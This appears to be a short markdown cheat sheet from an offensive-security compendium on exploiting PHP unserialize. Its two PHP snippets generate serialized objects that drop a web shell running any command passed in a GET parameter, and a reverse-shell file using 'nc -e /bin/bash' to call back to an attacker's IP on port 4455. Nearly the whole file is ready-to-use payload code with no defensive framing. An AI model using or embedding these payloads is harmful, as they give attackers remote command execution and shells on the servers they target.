killchain-compendium/Exploits/Web/PHP Deserialize.md

30 lines
540 B
Markdown
Raw Normal View History

2022-11-13 22:52:30 +01:00
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```
```php
<?php class file
{
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
}
echo (serialize(new file));
?>
```